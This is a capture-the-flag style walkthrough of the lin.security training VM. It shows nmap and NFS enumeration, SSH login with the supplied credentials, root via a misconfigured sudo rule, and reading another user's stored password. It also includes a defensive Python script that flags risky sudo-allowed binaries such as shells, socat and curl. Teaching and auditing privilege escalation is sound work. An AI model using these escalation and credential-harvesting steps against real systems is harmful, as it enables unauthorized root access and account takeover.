Lin Security Walkthrough

Description

Here at in.security we wanted to develop a Linux virtual machine that is based, at the time of writing, on an up-to-date Ubuntu distro (18.04 LTS), but suffers from a number of vulnerabilities that allow a user to escalate to root on the box. This has been designed to help understand how certain built-in applications and services, if misconfigured, may be abused by an attacker.

We have configured the box to simulate real-world vulnerabilities (albeit on a single host) which will help you to perfect your local privilege escalation skills, techniques and toolsets. There are a number of challenges which range from fairly easy to intermediate level and we’re excited to see the methods you use to solve them!

The image is just under 1.7 GB and can be downloaded using the link above. On opening the OVA file a VM named lin.security will be imported and configured with a NAT adapter, but this can be changed to bridged via the preferences of your preferred virtualisation platform.

To get started you can log onto the host with the credentials: bob/secret

Port scanning

The nmap port scan resulted in the following output:

root@kali:~# nmap -A -p 1-65535 192.168.43.150
Nmap scan report for linsecurity (192.168.43.150)
Host is up (0.00020s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
|   256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_  256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  3           2049/udp  nfs
|   100003  3,4         2049/tcp  nfs
|   100005  1,2,3      48327/udp  mountd
|   100005  1,2,3      60531/tcp  mountd
|   100021  1,3,4      35925/tcp  nlockmgr
|   100021  1,3,4      55354/udp  nlockmgr
|   100227  3           2049/tcp  nfs_acl
|_  100227  3           2049/udp  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
35925/tcp open  nlockmgr 1-4 (RPC #100021)
50119/tcp open  mountd   1-3 (RPC #100005)
52467/tcp open  mountd   1-3 (RPC #100005)
60531/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:A3:D2:FD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms linsecurity (192.168.43.150)

It looks like there’s a shared network filesystem…

root@kali:~# showmount -e 192.168.43.150
Export list for 192.168.43.150:
/home/peter *

As you can see, peter’s home folder was shared, but after mounting it, I couldn’t find anything interesting. The creator of the machine provided a username and a password to log in. So, let’s use them!

root@kali:~# ssh bob@192.168.43.150
bob@192.168.43.150's password:

Welcome to lin.security | https://in.security | version 1.0

bob@linsecurity:~$

Enumeration

As for enumeration, I checked bob’s privileges:

bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
        /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
        /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

Getting root access

We have the ability to run a bunch of things as root without actually knowing the root password. Probably the most convenient solution is to run the bash program as root.

bob@linsecurity:~$ sudo /bin/bash
root@linsecurity:~# whoami
root
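
From the defender's side, this kind of sudoers misconfiguration can be caught by reviewing `sudo -l` output for each account. The following is an added example, not part of the original walkthrough or the VM: it parses a listing like the one above and flags entries that amount to unrestricted root; the category grouping and the `/sbin/reboot` line are assumptions of the example.

```python
import os
import re

# Assumed risk grouping (this example's own, not from the walkthrough).
RISKY = {
    "shell": {"ash", "bash", "sh", "csh", "dash", "zsh"},
    "interpreter/launcher": {"awk", "perl", "tclsh", "expect", "env"},
    "editor/pager": {"ed", "vi", "rvim", "pico", "less", "more", "man"},
    "file access/exec": {"find", "git", "script", "ssh", "scp", "socat", "ftp", "curl"},
}

# Constructed sample: abbreviated listing from above plus one made-up entry.
SAMPLE = """\
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /usr/bin/curl, /usr/bin/find,
        /usr/bin/less, /usr/bin/scp, /usr/bin/vi, /usr/bin/git, /usr/bin/scp
    (ALL) NOPASSWD: /sbin/reboot
"""

def parse_sudo_l(text):
    """Return [(runas, command)] from the 'may run the following commands' part."""
    m = re.search(r"may run the following commands on [^\n]*:\n", text)
    if not m:
        return []
    body = " ".join(line.strip() for line in text[m.end():].splitlines())
    parts = re.split(r"\(([^)]+)\)", body)  # ['', runas, cmds, runas, cmds, ...]
    entries = []
    for runas, chunk in zip(parts[1::2], parts[2::2]):
        for cmd in re.split(r"(?<!\\),", chunk):  # "\," is an escaped comma
            cmd = re.sub(r"^(?:[A-Z_]+:\s*)+", "", cmd.strip())  # drop tags
            if cmd:
                entries.append((runas.strip(), cmd))
    return entries

def audit(text):
    """Map each distinct risky command to (runas, category)."""
    findings = {}
    for runas, cmd in parse_sudo_l(text):
        name = os.path.basename(cmd.split()[0])
        for category, names in RISKY.items():
            if name in names:
                findings[cmd] = (runas, category)
    return findings

if __name__ == "__main__":
    for cmd, (runas, category) in sorted(audit(SAMPLE).items()):
        print(f"[!] {cmd} as ({runas}): {category}")
```

An entry that is not flagged is not thereby safe; the lists only cover the binaries that appear in this machine's listing.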

At this point the challenge was over, but I checked out susan’s home directory and found a .secret file.

root@linsecurity:/home/susan# ls -la
total 32
drwxr-xr-x 4 susan susan 4096 Aug  6 21:38 .
drwxr-xr-x 5 root  root  4096 Jul  9 19:58 ..
-rw-r--r-- 1 susan susan  220 Jul  9 19:58 .bash_logout
-rw-r--r-- 1 susan susan 3771 Jul  9 19:58 .bashrc
drwx------ 2 susan susan 4096 Aug  6 21:38 .cache
drwx------ 3 susan susan 4096 Aug  6 21:38 .gnupg
-rw-r--r-- 1 susan susan  807 Jul  9 19:58 .profile
-rw-r--r-- 1 susan susan   20 Jul  9 19:57 .secret
root@linsecurity:/home/susan# cat .secret
MySuperS3cretValue!

It turned out that it was her SSH password…
